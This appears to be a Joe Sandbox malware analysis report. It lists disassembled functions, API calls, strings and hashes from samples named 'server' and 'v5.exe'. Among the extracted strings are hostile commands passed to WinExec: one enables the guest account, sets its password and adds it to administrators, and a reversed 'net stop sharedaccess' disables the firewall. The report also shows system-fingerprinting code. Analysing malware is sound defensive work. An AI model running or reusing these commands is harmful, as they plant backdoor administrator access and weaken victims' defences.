Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 136543108-0
Opcode ID: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
Instruction ID: 93ec0bc8b686358acc24e3714501cd84e213c2281eabc8766456639a8591c71b
Opcode Fuzzy Hash: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
Instruction Fuzzy Hash: C3115E34104B919FE312DB24C844B5BB7E9EB85724F408A0DF0A6566D1CBB868098BA2

Function 1000B030 Relevance: 6.0, APIs: 4, Instructions: 35registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
lstrlen.KERNEL32(?), ref: 1000B05E
RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
RegCloseKey.ADVAPI32(?), ref: 1000B084

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
Instruction ID: 7b49051102f8b3a7e04b5e6a6f77e5ac8f95ad15ac6f50b5fbf7acef8fa67196
Opcode Fuzzy Hash: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
Instruction Fuzzy Hash: 50F0D0753443527FF620CB50CD89F6B77EDEB88B50F108908F685A6190D6B0FD418B66

Function 100114A0 Relevance: 6.0, APIs: 4, Instructions: 34sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 100114BF
TerminateThread.KERNEL32(?,00000000), ref: 100114D8
Sleep.KERNEL32(00000001), ref: 100114E0
TerminateProcess.KERNEL32(?,00000001), ref: 100114E8

Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
String ID:
API String ID: 3242870944-0
Opcode ID: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
Instruction ID: c378b0861d785e21301bdfc87bc3ab075883bb077402934db3b02ae2e10452dd
Opcode Fuzzy Hash: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
Instruction Fuzzy Hash: D9F03732200350ABE310EB65CC85F5BB3A5BB88720F004A1DF6959B2D0D7B0E8448B51

Function 100067F0 Relevance: 6.0, APIs: 4, Instructions: 16threadwindowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 100067F3
GetCurrentThreadId.KERNEL32 ref: 100067FF
PostThreadMessageA.USER32(00000000), ref: 10006806
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: MessageThread$CurrentInputPostState
String ID:
API String ID: 2517755969-0
Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67

Function 10069340 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,00000000,00000000,?,10068F9D,?,?,?,?), ref: 10069393

Strings

FriendlyName, xrefs: 10069484

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: FriendlyName
API String ID: 542301482-3623505368
Opcode ID: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
Instruction ID: 258e8a263c28d7347944fa1d558e3935b77094b7b272d9d199a9c21f0b65fa88
Opcode Fuzzy Hash: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
Instruction Fuzzy Hash: 26512671204241AFC700DF58C8C4E9AB7EAFBC9724F508A6DF5998B251C735EC86CB62

Function 00404990 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 004049A4

Strings

, xrefs: 004049ED
, xrefs: 004049C9

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
Instruction ID: b87dcbb75cd3c471051da0e28ff986719ac4621f1c2140c0425cb5d80edd0c9f
Opcode Fuzzy Hash: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
Instruction Fuzzy Hash: 774167B12041585EFB12C660DD49BFB3FB89B46700FD400F6D649EA1D2C2794918CBAE

Function 1004C750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

_ftol.MSVCRT ref: 1004C7D9
_ftol.MSVCRT ref: 1004C7E6

Strings

*,, xrefs: 1004C76C

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: _ftol
String ID: *,
API String ID: 2545261903-327129236
Opcode ID: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
Instruction ID: accb0fd77c38b38dac35c35713d96fe46105689da0a5d4e94071b2b8a9246534
Opcode Fuzzy Hash: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
Instruction Fuzzy Hash: 1E11E676B082295BD350CF2AD88069E7BE5EB85BE1F32413AE408D7211D7319C948FD6

Function 1000B2A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68processCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(00000000,00000000), ref: 1000B346

Strings

/del, xrefs: 1000B319
net user , xrefs: 1000B2B9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Exec
String ID: /del$net user
API String ID: 459137531-2512890511
Opcode ID: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
Instruction ID: 5dd7e995ff607eb42942ab6a2a69a7874cb309585a325c5644f1848542d2a52f
Opcode Fuzzy Hash: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
Instruction Fuzzy Hash: 3B11BE36600A045BD718CA78D89066BB6D2FBC4330F148B3EFA66C32D0EEB59D49C245

Function 1000CB5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_0000C600,00000000), ref: 1000CB8E

Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79

Strings

|, xrefs: 1000CBD1
{, xrefs: 1000CBA6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@EnumWindows_ftol
String ID: {$|
API String ID: 1507428005-264143378
Opcode ID: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
Instruction ID: b21fffd7c8efe6577bddb62a25c2f06230fca87104460267a0584959008793d5
Opcode Fuzzy Hash: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
Instruction Fuzzy Hash: F301DB32604188DFE714DF68D85ABAEB7D5FB84310F40826EE90A972C1CBB55E05C750

Function 10006830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
sprintf.MSVCRT ref: 1000688E

Strings

\Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006849

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: DirectorySystemsprintf
String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
API String ID: 2264545904-1152295267
Opcode ID: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
Instruction ID: 99df4ed59750c9dd993d51c468aa5d343e53be9d723c6599038c39a96e95830f
Opcode Fuzzy Hash: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
Instruction Fuzzy Hash: 8DF0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255

Function 1000B3C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32processCOMMON

Download Yara Rule

APIs

_strrev.MSVCRT ref: 1000B400
WinExec.KERNEL32(00000000), ref: 1000B40A

Strings

sseccaderahs pots ten, xrefs: 1000B3DB

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Exec_strrev
String ID: sseccaderahs pots ten
API String ID: 37789026-4286520837
Opcode ID: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
Instruction ID: c3e97b05e1a0e89978fc418c8abf29a90b807b51c292c120b08a6d1b6e549f13
Opcode Fuzzy Hash: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
Instruction Fuzzy Hash: 2EF0A77650060017D7189639DC556DB7B96ABC5320F44462CF75B872D0D9B98908C281

Function 1000B360 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29processCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000B39A
WinExec.KERNEL32(?,00000000), ref: 1000B3AA

Strings

cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B394

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Execwsprintf
String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
API String ID: 3709078785-529560147
Opcode ID: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
Instruction ID: 0a7898c6996eab9a84bb7628cc6b94f02dfbc87351f9717496f3ad2297c58d40
Opcode Fuzzy Hash: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
Instruction Fuzzy Hash: 0FF0E5B56043007BF310C768DC44B8BB6A5ABD4704F00C939FB84D22A0EAF9D958C55A

Function 0040221D Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402245
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402279
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402293
HeapFree.KERNEL32(00000000,?,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 004022AA

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
Instruction ID: 68bd45274bd7996747cb266cb4e28ae1d64785b643fce2e0ad39ffcb9bf25311
Opcode Fuzzy Hash: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
Instruction Fuzzy Hash: 4D111C30200201AFD7319F58ED49E237BB5FBA47147A00639E556D61F1C7F0695ACB18

Function 10007160 Relevance: 5.0, APIs: 4, Instructions: 32stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,100071F6,?,?,?,L$_RasDefaultCredentials#0), ref: 1000716E
malloc.MSVCRT ref: 10007186
lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,10007451,?), ref: 1000719B
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,10007451,?), ref: 100071A3

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiWidemalloc
String ID:
API String ID: 3822420913-0
Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372

Analysis Process: v5.exePID: 7484, Parent PID: 632COMMON

Execution Graph

Execution Coverage:	25.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.5%
Total number of Nodes:	618
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00406090 Relevance: 144.0, APIs: 48, Strings: 34, Instructions: 522
libraryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
GetProcAddress.KERNEL32(00000000), ref: 004060AB
LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
GetProcAddress.KERNEL32(00000000), ref: 004060C8
GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
memset.MSVCRT ref: 004060F2
_mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
_mbscpy.MSVCRT(0000005D,2000), ref: 00406283
_mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
_mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
_mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
_mbscpy.MSVCRT(0000005D,2008), ref: 00406345
_mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
_mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
_mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
_mbscpy.MSVCRT(0000005D,2012), ref: 00406406
_mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
sprintf.MSVCRT ref: 0040649C
_mbscpy.MSVCRT(0000005D,?), ref: 004064B3
lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00406500
RegQueryValueExA.KERNELBASE(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
RegCloseKey.KERNELBASE(?), ref: 00406552
GetSystemInfo.KERNELBASE(?), ref: 0040655F
memset.MSVCRT ref: 00406570
sprintf.MSVCRT ref: 004065B5
_mbscpy.MSVCRT(-00000003,?), ref: 004065CC
_mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406666
__aulldiv.LIBCMT ref: 00406681
__aulldiv.LIBCMT ref: 0040668F
wsprintfA.USER32 ref: 004066B4
malloc.MSVCRT ref: 004066C9
GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
free.MSVCRT ref: 004066EB
malloc.MSVCRT ref: 004066F8
GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
strcmp.MSVCRT ref: 00406731
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
sprintf.MSVCRT ref: 004068CD
_mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7

Strings

KVa7, xrefs: 00406946, 00406728, 0040685E
N, xrefs: 00406111
2003, xrefs: 004062D9, 004062DF
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 004064D4
Find CPU Error, xrefs: 0040663F, 00406645
z, xrefs: 0040677A
8.1, xrefs: 0040642A, 00406430
T, xrefs: 00406118
Win, xrefs: 00406489, 0040648F
0.0.0.0, xrefs: 00406723
~MHz, xrefs: 00406539
%u MB, xrefs: 004066A8
2012, xrefs: 004063F8, 004063FE
MHz, xrefs: 00406594, 0040659A
7, xrefs: 004061AD
8, xrefs: 004061E6
%u Gbps, xrefs: 004068C1
2008R2, xrefs: 00406396, 0040639C
Vista, xrefs: 00406318, 0040631B
GetVersionExA, xrefs: 004060B7
@, xrefs: 00406655
X, xrefs: 0040613A
%s %s %s%d, xrefs: 00406490
KERNEL32.dll, xrefs: 004060BC
%u Mbps, xrefs: 004068F8
P, xrefs: 00406141
2008, xrefs: 00406337, 0040633D
RegCloseKey, xrefs: 0040609A
%d*%u%s, xrefs: 004065A9
ADVAPI32.dll, xrefs: 0040609F
KVa7, xrefs: 004066D9, 00406708, 00406953, 004066E7, 004066DC, 004066EA, 0040670B, 00406956
2000, xrefs: 00406278, 0040627B
S, xrefs: 0040645C
P, xrefs: 00406463

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: _mbscpy$Infosprintf$AdaptersAddressLibraryLoadProcSystemTable__aulldivmallocmemset$??2@CloseDefaultGlobalLanguageMemoryOpenQueryStatusValuefreelstrcpystrcmpwsprintf
String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
API String ID: 3282488517-2163519892
Opcode ID: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
Opcode Fuzzy Hash: 63299a0e361551339f6c41bc8fa1acc0d5ed4ae0495ff8515c854c0289c22c81
Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69

